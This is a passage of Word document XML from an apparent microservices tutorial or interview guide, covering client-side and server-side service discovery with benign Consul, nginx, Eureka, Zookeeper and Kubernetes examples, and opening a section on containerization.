        <w:t>Requires clients to be aware of the service discovery mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4732803A" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can introduce complexity in client logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E00F1"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using consul client-side discovery in Node.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5741AF0D"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consul = require('consul')();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE57BBD"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7C8B85C"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getServiceAddress(serviceName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A556BD4"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1665A8"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services = await consul.catalog.service.list();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38469601"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services[serviceName];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F57225"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(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11289763"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fetching service address: ${error}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D446F4E"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56EE1F9"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9DFD0BF"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A57E736"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Example usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694DC274"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getServiceAddress('my-service').then(address =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729D30D"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console.log('Service Address:', address);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A927DAD"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0EC3B86" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Server-Side Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4702D"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In server-side discovery, the client sends requests to a load balancer or proxy, which is responsible for querying the service registry and routing requests to the appropriate service instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724048C9" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27352A14" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplifies client logic by offloading service discovery and load balancing to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9BF9D6" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Centralized management of service discovery and load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CC65E7" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="310"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E1C9E" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Requires an additional component (load balancer or proxy) in the architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624CC119" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can become a single point of failure if not designed with redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598C4E8"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example using nginx as a load balancer with service discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456BD1C3"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upstream my_service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B0A2B"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server my-service-1:3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1F5C7"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server my-service-2:3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375EAB2F"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5DA0663"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833D569"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server {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F07FE"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listen 80;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253275DD"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BE069EB"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location / {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C0C8E"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proxy_pass http://my_service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A4F31"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80D000F"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5C849FE"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, Nginx will balance requests between instances of my-service based on the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB6992" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Service Discovery Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DC6C8" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF97BD" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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Consul is a tool for service discovery, health checking, and configuration. It provides a service registry, where services can register themselves and discover others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CCE02A" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC06F12"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Health checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771C7C6"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Key-value store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309E6A6"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Integration with various load balancers and proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE24179"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF8A26"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consul = require('consul')();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093A1F5"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AB8F8CB"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consul.agent.service.register({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D2D7A"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'my-service',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6136A831"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address: '127.0.0.1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF37D8"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port: 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E1D5A"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(err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7968F543"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4A95F703"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console.log('Service registered');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763208AD"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883C5D6" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72499FA5" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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Eureka is a service discovery tool developed by Netflix. It provides a REST-based service registry for service registration and discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E755B" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4768D3A3"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Self-preservation mode to handle network partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BFB2B"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REST API for service registration and discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642F6A20"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Integration with Spring Cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A072EBC"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example usage with Spring Cloud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A255C97"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eureka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E02A6"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client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F983C19"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serviceUrl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4661D9"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defaultZone: http://localhost:8761/eureka/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D24A8B6" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226910BB" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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Zookeeper is a distributed coordination service that can be used for service discovery. It provides a hierarchical namespace for service registration and discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B39BC5" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B9323"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Hierarchical structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F84C88"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lastRenderedPageBreak/>
        <w:t>Coordination and synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719CB453"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High availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BED9D4"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example usage with node-zookeeper-client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A925854"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zookeeper = require('node-zookeeper-client');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5373BF"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client = zookeeper.createClient('localhost:2181');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C2914"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B108AB5"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client.connect();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5FC32"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EC8FE14"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client.once('connected', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC81F08"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console.log('Connected to Zookeeper');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B409D"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6CA7E2F"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Register service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61579EEC"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client.create('/services/my-service', Buffer.from('127.0.0.1:3000'), error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978B95E"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(error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C5219"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console.error(`Failed to register service: ${error}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019641CF"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7C674291"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console.log('Service registered');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2071A080"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2271C33"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171B83A" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D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2B571E5" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF3C86" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31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In a Kubernetes environment, service discovery is built-in. Kubernetes manages services and their endpoints, allowing pods to communicate using service names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1021D4D2" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE44BE"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Built-in DNS-based service discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD01FAA"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Load balancing across service endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B934C" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Integration with Kubernetes orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062EC2F3" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D1" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example usage with Kubernetes DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACCC60" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D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Accessing a service from another pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A293CC5" w14:textId="77777777" w:rsidR="00E807D1" w:rsidRPr="00DA2F32" w:rsidRDefault="00E807D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const serviceUrl = 'http://my-service.default.svc.cluster.local';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1D4D3" w14:textId="77777777" w:rsidR="0018537F" w:rsidRPr="00DA2F32" w:rsidRDefault="0018537F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6901280E" w14:textId="4B3E6138" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc178383296"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is containerization, and how does it relate to microservices?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="4F1802DC" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Containerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technology that encapsulates an application and its dependencies into a container, which is a lightweight, portable, and consistent unit of software. This concept is crucial for modern application development, particularly in microservices architectures. Here’s an overview of containerization and its relationship to microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67328996" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Containerization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D52D44" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45364126" w14:textId="77777777" w:rsidR="00021C15" w:rsidRPr="00DA2F32" w:rsidRDefault="00021C15" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
